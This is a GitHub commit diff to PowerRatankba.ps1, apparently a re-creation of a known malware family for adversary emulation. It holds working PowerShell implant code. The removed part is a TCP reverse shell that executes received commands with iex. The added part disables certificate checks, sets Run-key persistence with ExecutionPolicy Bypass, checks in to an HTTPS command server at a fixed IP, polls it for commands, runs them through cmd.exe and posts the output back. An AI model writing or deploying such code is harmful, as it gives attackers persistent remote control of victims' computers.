Update PowerRatankba.ps1

This commit is contained in:
S3N4T0R
2025-08-07 13:40:24 -04:00
committed by GitHub
parent 05818aab55
commit 0cb9d4a9a8
@@ -1,26 +1,67 @@
Add-Type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
# Stageless PowerShell Payload
while ($true) {
try {
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.14', 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush()
}
$client.Close();
} catch {
Start-Sleep -Seconds 5; # Wait before reconnecting
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
# Persistence via Registry (Run Key)
$regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
$regName = "Payload"
$regValue = "powershell -ExecutionPolicy Bypass -File $PSCommandPath"
Set-ItemProperty -Path $regPath -Name $regName -Value $regValue
$server = "https://192.168.1.14:1111"
# Checkin
$checkin_data = @{ } | ConvertTo-Json
try {
Write-Host "[*] Sending checkin..."
$response = Invoke-RestMethod -Uri "$server/checkin" -Method POST -Body $checkin_data -ContentType "application/json"
$session_id = $response.session_id
Write-Host "[+] Checkin successful: $session_id"
} catch {
Write-Host "[-] Checkin failed: $_"
exit
}
# Loop to get commands
while ($true) {
Start-Sleep -Seconds 3
try {
$cmd_resp = Invoke-RestMethod -Uri "$server/get_command?session_id=$session_id" -Method GET
$cmd = $cmd_resp.command
if ($cmd) {
if ($cmd -match "`r`n|\n") {
# Multiple lines -> write to temp .bat file
$tempFile = [System.IO.Path]::GetTempFileName().Replace(".tmp", ".bat")
[System.IO.File]::WriteAllText($tempFile, $cmd)
$output = cmd.exe /c $tempFile 2>&1 | Out-String
Remove-Item $tempFile -Force -ErrorAction SilentlyContinue
} else {
# Single-line command
$output = cmd.exe /c $cmd 2>&1 | Out-String
}
$send_data = @{
session_id = $session_id
output = $output
} | ConvertTo-Json -Depth 3
Invoke-RestMethod -Uri "$server/send_output" -Method POST -Body $send_data -ContentType "application/json"
}
} catch {
Write-Host "[-] Error: $_"
}
}